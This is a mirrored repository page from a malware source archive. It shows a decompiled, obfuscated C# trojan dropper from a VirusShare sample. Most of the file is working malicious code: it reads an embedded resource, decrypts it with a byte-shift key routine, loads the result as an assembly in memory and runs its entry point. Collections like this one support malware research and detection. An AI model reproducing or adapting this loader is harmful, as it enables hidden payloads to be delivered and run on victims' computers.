ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 11:26:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Trojan-Dropper/Win32/I/Trojan-Dropper.Win32.Injector.acsv-43bbe26a7f41a161062d0c91d3d16a0fee497cd0605b1916485a06b4465092c1/ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎ.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

66 lines
6.4 KiB
C#
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: ǣƀƥǣǤӸƔƙƳǥƴƣƜƕơպƙȜƁƂƕƕҿǢƔƄռƋպֆƓƐȄƓƀƐƒռֆպȞӂƋǢƥƴƈƑȣƕƣǍƑƪƕȜƥƂփƓƎƓƜƲȜӸǣƀƙƏƑƴֆƎƄƴƅǢƕƜƁƜƂƉƂơƋƆǍƛ.ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƀպӂƄȮȜƜƛǣӂֆƂǥƴƴփȜƥƉֆƲǢƥƙƑǢռҧƐȞƂȄǤȞƥƙӸպȞƩƒȜơƥȣƏƙǍҿӸǭƙƘƕǍƖƂȣƘǎƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƣȮƓǎփƏƕƀƲƪƓƆƖƒռȮƆƛƂƁǢƒƕƜȞƔƣƲƁƩռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣƜȄƄƗȮƗƀֆƅƪƳҿơƲǢƙƂƣҿƪƈƩպƲƗƗӸҿƗǢƒƋƖƀǍƂƅƄֆƎȣƴƈƜƄǭռƣƙƔǍӂƓƄӂƳƗƋƄƉ
// Assembly: cryptbs, Version=2.6.12.79, Culture=neutral, PublicKeyToken=null
// MVID: FC627692-FCDB-4E6B-82E3-E24FD4825A81
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.acsv-43bbe26a7f41a161062d0c91d3d16a0fee497cd0605b1916485a06b4465092c1.exe
using System;
using System.Reflection;
using System.Resources;
using System.Text;
using System.Windows.Forms;
namespace ǣƀƥǣǤӸƔƙƳǥƴƣƜƕơպƙȜƁƂƕƕҿǢƔƄռƋպֆƓƐȄƓƀƐƒռֆպȞӂƋǢƥƴƈƑȣƕƣǍƑƪƕȜƥƂփƓƎƓƜƲȜӸǣƀƙƏƑƴֆƎƄƴƅǢƕƜƁƜƂƉƂơƋƆǍƛ
{
internal class ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƀպӂƄȮȜƜƛǣӂֆƂǥƴƴփȜƥƉֆƲǢƥƙƑǢռҧƐȞƂȄǤȞƥƙӸպȞƩƒȜơƥȣƏƙǍҿӸǭƙƘƕǍƖƂȣƘǎƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƣȮƓǎփƏƕƀƲƪƓƆƖƒռȮƆƛƂƁǢƒƕƜȞƔƣƲƁƩռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣƜȄƄƗȮƗƀֆƅƪƳҿơƲǢƙƂƣҿƪƈƩպƲƗƗӸҿƗǢƒƋƖƀǍƂƅƄֆƎȣƴƈƜƄǭռƣƙƔǍӂƓƄӂƳƗƋƄƉ
{
public static ResourceManager պƑƥǍƣƉƙƉƒƲƐȮƴƜƈƘȄƛƐƉƱƍȄƱƏƋƣƜǍǥ = new ResourceManager("aeXA1kMRBuc3", Assembly.GetExecutingAssembly());
private static void Main()
{
try
{
ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƀպӂƄȮȜƜƛǣӂֆƂǥƴƴփȜƥƉֆƲǢƥƙƑǢռҧƐȞƂȄǤȞƥƙӸպȞƩƒȜơƥȣƏƙǍҿӸǭƙƘƕǍƖƂȣƘǎƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƣȮƓǎփƏƕƀƲƪƓƆƖƒռȮƆƛƂƁǢƒƕƜȞƔƣƲƁƩռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣƜȄƄƗȮƗƀֆƅƪƳҿơƲǢƙƂƣҿƪƈƩպƲƗƗӸҿƗǢƒƋƖƀǍƂƅƄֆƎȣƴƈƜƄǭռƣƙƔǍӂƓƄӂƳƗƋƄƉ.ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƒռƓփƅƂƥƒȣƑֆƳȮƐơǥƩȞƅƛǍȜƍơƓҧƩƔӂƳƥƎƕƏƒƍƜǥƪƳǤƅƑƉǤփơȄƍǣƏƉƪƍƄƑƈǭƐƐ(Encoding.Default.GetBytes((string) ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮǭƈƁӂҿǥƘǥƲǍȄơֆƳȣƕƏǣӂơƜƉȮǤƓǤփǍƖȮƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƀպӂƄȮȜƜƛǣӂֆƂǥƴƴփȜƥƉֆƲǢƥƙƑǢռҧƐȞƂȄǤȞƥƙӸպȞƩƒȜơƥȣƏƙǍҿӸǭƙƘƕǍƖƂȣƘǎƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆƣȮƓǎփƏƕƀƲƪƓƆƖƒռȮƆƛƂƁǢƒƕƜȞƔƣƲƁƩռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣƜȄƄƗȮƗƀֆƅƪƳҿơƲǢƙƂƣҿƪƈƩպƲƗƗӸҿƗǢƒƋƖƀǍƂƅƄֆƎȣƴƈƜƄǭռƣƙƔǍӂƓƄӂƳƗƋƄƉ.պƑƥǍƣƉƙƉƒƲƐȮƴƜƈƘȄƛƐƉƱƍȄƱƏƋƣƜǍǥ.GetObject("aQ8ZhGcxsG_zmxYWJVbiUyrnffY")));
}
catch (Exception ex)
{
int num = (int) MessageBox.Show(ex.ToString());
}
}
public static void ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖƒռƓփƅƂƥƒȣƑֆƳȮƐơǥƩȞƅƛǍȜƍơƓҧƩƔӂƳƥƎƕƏƒƍƜǥƪƳǤƅƑƉǤփơȄƍǣƏƉƪƍƄƑƈǭƐƐ(
byte[] ƴƪƕփփƗƪƔƩǭȣǎҧƐƎƣƔƆƈƆƑǢƁƗƙӂơƈƕƄռƔӸƉƄƪƱƲȜƪƒǢȄƱǎǢƔƴƘǥƅƕƁƱƐƜǍƔƅƋ)
{
MethodInfo entryPoint = Assembly.Load(ƴƪƕփփƗƪƔƩǭȣǎҧƐƎƣƔƆƈƆƑǢƁƗƙӂơƈƕƄռƔӸƉƄƪƱƲȜƪƒǢȄƱǎǢƔƴƘǥƅƕƁƱƐƜǍƔƅƋ).EntryPoint;
object[] parameters = (object[]) null;
if (entryPoint.GetParameters().Length > 0)
parameters = new object[1]
{
(object) new string[1]{ "1" }
};
entryPoint.Invoke((object) null, parameters);
}
public static byte[] ƲƥƁƉƉֆƴƘƄǢƗƁӸƏƙƑȮӂƳǎƥȄƈպơƖƋƥƖƆȞƄƲƖƄƖƎӸƆƍǣǥƎӂƓƅƑƐǥƴȜȮƈǭƅǥƣӸƜƔҧǭƍƈǥռƀơƩӸǥȜƕƜƓƴȜƘȜȜƩǭǍƜպƥǣȮƱƆEn(
byte[] ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ,
string ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖ)
{
byte[] bytes = Encoding.ASCII.GetBytes(ƏƙƱƑȄǍƁƓƱƏƒƪƩƍֆƛƱƴƆƔƁփƑƄպǎӸƘǎƖ);
int num = (int) ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ[ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ.Length - 1];
byte[] numArray = new byte[ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ.Length - 1];
short index1 = 0;
for (int index2 = 0; index2 < ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ.Length - 1; ++index2)
{
if ((int) index1 >= bytes.Length)
index1 = (short) 0;
if (index2 < ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ.Length - 1)
{
numArray[index2] = Convert.ToByte((int) ռƑƥȞƥǤƐǎƍƆȣҧպҿƛӸƥƂƔƑǭǢǢƓƜƛƒƣƳȣ[index2] - numArray.Length % bytes.Length - (int) bytes[(int) index1] + num);
++index1;
}
}
return numArray;
}
}
}
Reference in New Issue View Git Blame Copy Permalink